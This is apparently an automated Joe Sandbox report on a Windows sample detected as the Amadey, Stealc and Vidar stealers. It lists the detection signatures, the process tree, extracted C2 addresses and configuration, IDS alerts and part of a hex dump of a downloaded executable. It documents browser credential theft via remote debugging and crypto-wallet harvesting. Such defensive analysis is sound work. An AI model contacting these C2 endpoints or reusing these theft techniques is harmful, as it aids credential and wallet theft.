Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1563633
MD5:40fbf66fe2c47dcd8d2de9191b48b355
SHA1:eb7260a1cf345b9a225fa6250727db32e391ffd6
SHA256:c5723c29a13feb389fd9e72e6e81d914c0693d9846c2810d1d0bad4e3307eb78
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 5788 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 40FBF66FE2C47DCD8D2DE9191B48B355)
    • chrome.exe (PID: 7648 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7876 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2284,i,5232988169376499701,3184927908261316226,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • msedge.exe (PID: 5664 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6792 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2196,i,16641813798157535699,2496316306201549847,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • cmd.exe (PID: 1100 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHDHJEBGH.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • DocumentsGDHDHJEBGH.exe (PID: 8504 cmdline: "C:\Users\user\DocumentsGDHDHJEBGH.exe" MD5: FA098B363F56394EB669A96201D3521D)
        • skotes.exe (PID: 9076 cmdline: "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: FA098B363F56394EB669A96201D3521D)
  • msedge.exe (PID: 4864 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8284 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6484 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8312 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6708 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5096 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6740 --field-trial-handle=2272,i,3252984328910052623,10952965601817895583,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • skotes.exe (PID: 8868 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FA098B363F56394EB669A96201D3521D)
  • skotes.exe (PID: 1796 cmdline: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: FA098B363F56394EB669A96201D3521D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001F.00000003.2020656873.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      0000001E.00000003.1895865210.0000000004C00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        0000001B.00000002.1906378602.00000000003F1000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000001B.00000003.1865340368.0000000005100000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Click to see the 12 entries
              SourceRuleDescriptionAuthorStrings
              31.2.skotes.exe.3f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                27.2.skotes.exe.3f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  30.2.skotes.exe.3f0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    26.2.DocumentsGDHDHJEBGH.exe.860000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 5788, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 7648, ProcessName: chrome.exe
                      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 8868, ProcessName: skotes.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:15.502260+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.749706TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:15.362094+010020442441Malware Command and Control Activity Detected192.168.2.749706185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:15.845477+010020442461Malware Command and Control Activity Detected192.168.2.749706185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:17.703156+010020442481Malware Command and Control Activity Detected192.168.2.749706185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:16.005002+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.749706TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:14.897754+010020442431Malware Command and Control Activity Detected192.168.2.749706185.215.113.20680TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:07:25.827643+010028561471A Network Trojan was detected192.168.2.749996185.215.113.4380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:01.664645+010028561221A Network Trojan was detected185.215.113.4380192.168.2.750003TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:07:31.393853+010028033053Unknown Traffic192.168.2.75000945.112.123.227443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T09:06:18.164796+010028033043Unknown Traffic192.168.2.749706185.215.113.20680TCP
                      2024-11-27T09:06:40.915349+010028033043Unknown Traffic192.168.2.749785185.215.113.20680TCP
                      2024-11-27T09:06:42.803833+010028033043Unknown Traffic192.168.2.749785185.215.113.20680TCP
                      2024-11-27T09:06:44.101186+010028033043Unknown Traffic192.168.2.749785185.215.113.20680TCP
                      2024-11-27T09:06:45.192775+010028033043Unknown Traffic192.168.2.749785185.215.113.20680TCP
                      2024-11-27T09:06:48.689979+010028033043Unknown Traffic192.168.2.749785185.215.113.20680TCP
                      2024-11-27T09:06:49.789056+010028033043Unknown Traffic192.168.2.749785185.215.113.20680TCP
                      2024-11-27T09:06:56.149181+010028033043Unknown Traffic192.168.2.749912185.215.113.1680TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: http://185.215.113.206/c4becf79229cb002.php9)Avira URL Cloud: Label: malware
                      Source: http://185.215.113.206/c4becf79229cb002.phpnbAvira URL Cloud: Label: malware
                      Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll&Avira URL Cloud: Label: malware
                      Source: 0000001F.00000003.2020656873.0000000004EC0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                      Source: 00000002.00000002.1827339860.000000000191E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                      Source: file.exeReversingLabs: Detection: 47%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEAA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,2_2_6CEAA9A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA44C0 PK11_PubEncrypt,2_2_6CEA44C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA4440 PK11_PrivDecrypt,2_2_6CEA4440
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE74420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,2_2_6CE74420
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEF25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,2_2_6CEF25B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE8E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,2_2_6CE8E6E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE88670 PK11_ExportEncryptedPrivKeyInfo,2_2_6CE88670
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEAA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,2_2_6CEAA650
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,2_2_6CECA730
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CED0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,2_2_6CED0180
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA43B0 PK11_PubEncryptPKCS1,PR_SetError,2_2_6CEA43B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,2_2_6CEC7C00
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE87D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,2_2_6CE87D60
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,2_2_6CECBD30
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEC9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,2_2_6CEC9EC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA3FF0 PK11_PrivDecryptPKCS1,2_2_6CEA3FF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,2_2_6CEA9840
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CEA3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,2_2_6CEA3850
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CECDA40 SEC_PKCS7ContentIsEncrypted,2_2_6CECDA40
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.7:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.7:49762 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.231.128.67:443 -> 192.168.2.7:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.231.128.67:443 -> 192.168.2.7:49827 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49871 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49885 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.7:49955 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.112.123.227:443 -> 192.168.2.7:50009 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.112.123.225:443 -> 192.168.2.7:50015 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:50061 version: TLS 1.2
                      Source: Binary string: mozglue.pdbP source: file.exe, 00000002.00000002.1868728023.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr
                      Source: Binary string: nss3.pdb@ source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.2.dr
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                      Source: Binary string: nss3.pdb source: file.exe, 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.2.dr
                      Source: Binary string: mozglue.pdb source: file.exe, 00000002.00000002.1868728023.000000007013D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: chrome.exeMemory has grown: Private usage: 1MB later: 30MB

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.7:49706
                      Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.7:49706
                      Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49706 -> 185.215.113.206:80
                      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49996 -> 185.215.113.43:80
                      Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.7:50003
                      Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                      Source: Malware configuration extractorIPs: 185.215.113.43
                      Source: DNS query: script.irisstealer.xyz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Nov 2024 08:06:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 